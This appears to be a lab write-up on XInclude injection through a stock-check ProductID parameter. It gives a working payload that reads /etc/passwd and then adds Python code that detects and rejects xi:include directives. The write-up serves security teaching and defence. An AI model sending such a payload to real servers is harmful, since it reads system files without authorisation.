We clicked the “check stock” button, captured the resulting POST request, and scanned the selected insertion point as a new task. The scan reported that the ProductID parameter is vulnerable to XML injection.

We edited the payload to set `parse="text"` and point the include at /etc/passwd, received the file content in the response, and solved the lab:

```xml
<onz xmlns:xi="http://www.w3.org/2001/XInclude"><xi:include parse="text" href="file:///etc/passwd"/></onz>
```
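On the defensive side, an added example (not from the lab or this write-up) in Python's standard library: it shows that an `xi:include` element stays inert unless the server explicitly asks the parser to expand XInclude, and a pre-parse check a backend could apply to reject such directives in untrusted input. The request shape, the function names and the placeholder `href` are assumptions.

```python
# Added example: detecting XInclude directives in user-controlled XML before
# parsing. Python stdlib only (xml.etree). Constructed; not from the lab.
import xml.etree.ElementTree as ET

XI_NS = "http://www.w3.org/2001/XInclude"

# Constructed request fragment shaped like the lab payload, but with a
# placeholder path instead of a real file.
UNTRUSTED_PRODUCT_ID = (
    '<onz xmlns:xi="http://www.w3.org/2001/XInclude">'
    '<xi:include parse="text" href="file:///PLACEHOLDER/path"/></onz>'
)


def build_stock_request(product_id_fragment: str) -> str:
    """Simulates a backend that splices the user-supplied productId into an
    XML document it then parses: the pattern the lab exploits (assumed)."""
    return f"<stockCheck><productId>{product_id_fragment}</productId></stockCheck>"


def find_xinclude_elements(xml_text: str) -> list[str]:
    """Return the tags of every element in the XInclude namespace.

    ElementTree only processes xi:include when ElementInclude.include() is
    called explicitly, so merely parsing and walking the tree does not fetch
    the href target.
    """
    root = ET.fromstring(xml_text)
    return [el.tag for el in root.iter() if el.tag.startswith("{" + XI_NS + "}")]


def parse_stock_check_safely(xml_text: str) -> str:
    """Parse the request, refuse any XInclude directive, and never call
    ElementInclude.include(), so no href is ever resolved."""
    hits = find_xinclude_elements(xml_text)
    if hits:
        raise ValueError(f"rejected: XInclude directive(s) in untrusted input: {hits}")
    root = ET.fromstring(xml_text)
    return root.findtext("productId") or ""
```

The same rule applies to other parsers: leave XInclude disabled (for example `setXIncludeAware(false)` in Java's DocumentBuilderFactory) and treat any `xi:include` in client input as a rejection, not something to resolve.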